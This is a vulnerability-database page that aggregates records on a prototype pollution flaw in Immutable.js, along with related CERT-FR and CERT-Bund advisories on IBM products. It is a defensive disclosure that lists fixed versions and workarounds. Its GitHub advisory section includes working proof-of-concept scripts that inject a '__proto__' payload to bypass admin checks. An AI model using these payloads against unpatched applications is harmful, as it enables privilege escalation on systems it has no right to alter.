Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-29063 (GCVE-0-2026-29063)
Vulnerability from cvelistv5 – Published: 2026-03-06 18:25 – Updated: 2026-03-06 19:33- CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| immutable-js | immutable-js |
Affected:
< 3.8.3
Affected: < 4.3.7 Affected: < 5.1.5 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-29063",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-06T19:32:37.694711Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T19:33:31.642Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "immutable-js",
"vendor": "immutable-js",
"versions": [
{
"status": "affected",
"version": "\u003c 3.8.3"
},
{
"status": "affected",
"version": "\u003c 4.3.7"
},
{
"status": "affected",
"version": "\u003c 5.1.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1321",
"description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T18:25:22.438Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
},
{
"name": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"name": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"name": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
}
],
"source": {
"advisory": "GHSA-wf6x-7x77-mvgw",
"discovery": "UNKNOWN"
},
"title": "Immutable.js: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in immutable"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-29063",
"datePublished": "2026-03-06T18:25:22.438Z",
"dateReserved": "2026-03-03T20:51:43.481Z",
"dateUpdated": "2026-03-06T19:33:31.642Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-29063\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-06T19:16:21.557\",\"lastModified\":\"2026-03-09T13:35:34.633\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"references\":[{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29063\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-06T19:32:37.694711Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-06T19:32:46.434Z\"}}], \"cna\": {\"title\": \"Immutable.js: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027) in immutable\", \"source\": {\"advisory\": \"GHSA-wf6x-7x77-mvgw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"immutable-js\", \"product\": \"immutable-js\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.8.3\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.3.7\"}, {\"status\": \"affected\", \"version\": \"\u003c 5.1.5\"}]}], \"references\": [{\"url\": \"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\", \"name\": \"https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\", \"name\": \"https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-06T18:25:22.438Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-29063\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-06T19:33:31.642Z\", \"dateReserved\": \"2026-03-03T20:51:43.481Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-06T18:25:22.438Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-29063
Vulnerability from fkie_nvd - Published: 2026-03-06 19:16 - Updated: 2026-03-09 13:35| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5."
},
{
"lang": "es",
"value": "Immutable.js proporciona muchas estructuras de datos inmutables persistentes. Antes de las versiones 3.8.3, 4.3.7 y 5.1.5, la contaminaci\u00f3n de prototipos es posible en immutable a trav\u00e9s de las APIs mergeDeep(), mergeDeepWith(), merge(), Map.toJS() y Map.toObject(). Este problema ha sido parcheado en las versiones 3.8.3, 4.3.7 y 5.1.5."
}
],
"id": "CVE-2026-29063",
"lastModified": "2026-03-09T13:35:34.633",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-06T19:16:21.557",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1321"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
CERTFR-2026-AVI-0372
Vulnerability from certfr_avis - Published: 2026-03-27 - Updated: 2026-03-27
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
L'éditeur indique que les versions correctives suivantes seront mises à disposition ultérieurement : - WebSphere Application Server - Liberty 26.0.0.4 (deuxième trimestre 2026)
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | WebSphere | WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | WebSphere Application Server - Liberty sans le correctif APAR PH70510 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct pour UNIX versions 6.4.x antérieures à 6.4.0.5 | ||
| IBM | WebSphere | WebSphere eXtreme Scale versions 8.6.1.x antérieures à 8.6.1.6 sans le correctif APAR PH70422 | ||
| IBM | Security QRadar Log Management AQL | greffon Security QRadar Log Management AQL versions 1.x antérieures à 1.1.4 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct pour UNIX versions 6.3.x antérieures à 6.3.0.7 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct FTP+ versions 1.3.0.x antérieures à 1.3.0.4 |
| Title | Publication Time | Tags | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server - Liberty sans le correctif APAR PH70510",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour UNIX versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.5",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere eXtreme Scale versions 8.6.1.x ant\u00e9rieures \u00e0 8.6.1.6 sans le correctif APAR PH70422",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "greffon Security QRadar Log Management AQL versions 1.x ant\u00e9rieures \u00e0 1.1.4",
"product": {
"name": "Security QRadar Log Management AQL",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour UNIX versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.7",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct FTP+ versions 1.3.0.x ant\u00e9rieures \u00e0 1.3.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "L\u0027\u00e9diteur indique que les versions correctives suivantes seront mises \u00e0 disposition ult\u00e9rieurement : \n- WebSphere Application Server - Liberty 26.0.0.4 (deuxi\u00e8me trimestre 2026)",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2026-1188",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1188"
},
{
"name": "CVE-2024-29371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
}
],
"initial_release_date": "2026-03-27T00:00:00",
"last_revision_date": "2026-03-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0372",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-27T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer un d\u00e9ni de service \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267514",
"url": "https://www.ibm.com/support/pages/node/7267514"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267346",
"url": "https://www.ibm.com/support/pages/node/7267346"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267392",
"url": "https://www.ibm.com/support/pages/node/7267392"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267689",
"url": "https://www.ibm.com/support/pages/node/7267689"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267351",
"url": "https://www.ibm.com/support/pages/node/7267351"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7267058",
"url": "https://www.ibm.com/support/pages/node/7267058"
}
]
}
WID-SEC-W-2026-0845
Vulnerability from csaf_certbund - Published: 2026-03-24 23:00 - Updated: 2026-03-25 23:00{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM WebSphere Application Server ist ein J2EE-Applikationsserver.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in IBM WebSphere Application Server Liberty ausnutzen, um seine Privilegien zu erh\u00f6hen, Sicherheitsma\u00dfnahmen zu umgehen und Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- MacOS X\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0845 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0845.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0845 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0845"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2026-03-24",
"url": "https://www.ibm.com/support/pages/node/7267345"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2026-03-24",
"url": "https://www.ibm.com/support/pages/node/7267347"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2026-03-24",
"url": "https://www.ibm.com/support/pages/node/7267351"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2026-03-24",
"url": "https://www.ibm.com/support/pages/node/7267362"
}
],
"source_lang": "en-US",
"title": "IBM WebSphere Application Server Liberty: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-03-25T23:00:00.000+00:00",
"generator": {
"date": "2026-03-26T08:01:30.163+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0845",
"initial_release_date": "2026-03-24T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-03-24T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-03-25T23:00:00.000+00:00",
"number": "2",
"summary": "Referenz(en) aufgenommen: EUVD-2025-209020, EUVD-2026-15982, EUVD-2025-209021"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "Liberty \u003c26.0.0.4",
"product": {
"name": "IBM WebSphere Application Server Liberty \u003c26.0.0.4",
"product_id": "T052106"
}
},
{
"category": "product_version",
"name": "Liberty 26.0.0.4",
"product": {
"name": "IBM WebSphere Application Server Liberty 26.0.0.4",
"product_id": "T052106-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:websphere_application_server:liberty__26.0.0.4"
}
}
}
],
"category": "product_name",
"name": "WebSphere Application Server"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-14915",
"product_status": {
"known_affected": [
"T052106"
]
},
"release_date": "2026-03-24T23:00:00.000+00:00",
"title": "CVE-2025-14915"
},
{
"cve": "CVE-2025-14917",
"product_status": {
"known_affected": [
"T052106"
]
},
"release_date": "2026-03-24T23:00:00.000+00:00",
"title": "CVE-2025-14917"
},
{
"cve": "CVE-2026-1561",
"product_status": {
"known_affected": [
"T052106"
]
},
"release_date": "2026-03-24T23:00:00.000+00:00",
"title": "CVE-2026-1561"
},
{
"cve": "CVE-2026-29063",
"product_status": {
"known_affected": [
"T052106"
]
},
"release_date": "2026-03-24T23:00:00.000+00:00",
"title": "CVE-2026-29063"
}
]
}
GHSA-WF6X-7X77-MVGW
Vulnerability from github – Published: 2026-03-04 21:28 – Updated: 2026-03-06 22:51Impact
What kind of vulnerability is it? Who is impacted?
A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.
Affected APIs
| API | Notes |
|---|---|
mergeDeep(target, source) |
Iterates source keys via ObjectSeq, assigns merged[key] |
mergeDeepWith(merger, target, source) |
Same code path |
merge(target, source) |
Shallow variant, same assignment logic |
Map.toJS() |
object[k] = v in toObject() with no __proto__ guard |
Map.toObject() |
Same toObject() implementation |
Map.mergeDeep(source) |
When source is converted to plain object |
Patches
Has the problem been patched? What versions should users upgrade to?
| major version | patched version |
|---|---|
| 3.x | 3.8.3 |
| 4.x | 4.3.7 |
| 5.x | 5.1.5 |
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
- Validate user input
- Node.js flag --disable-proto
- Lock down built-in objects
- Avoid lookups on the prototype
- Create JavaScript objects with null prototype
Proof of Concept
PoC 1 — mergeDeep privilege escalation
"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4
// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
'{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);
const merged = mergeDeep(userProfile, requestBody);
console.log("merged.name:", merged.name); // Eve (updated correctly)
console.log("merged.role:", merged.role); // user (own property wins)
console.log("merged.admin:", merged.admin); // true ← INJECTED via __proto__!
// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)
// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true
PoC 2 — All affected APIs
"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");
const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');
// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true
// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true
// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true
// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true
// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true
// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true
// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)
Verified output against immutable@5.1.4:
mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined ← global Object.prototype NOT polluted
References
Are there any links users can visit to find out more?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-rc.1"
},
{
"fixed": "4.3.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.1.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
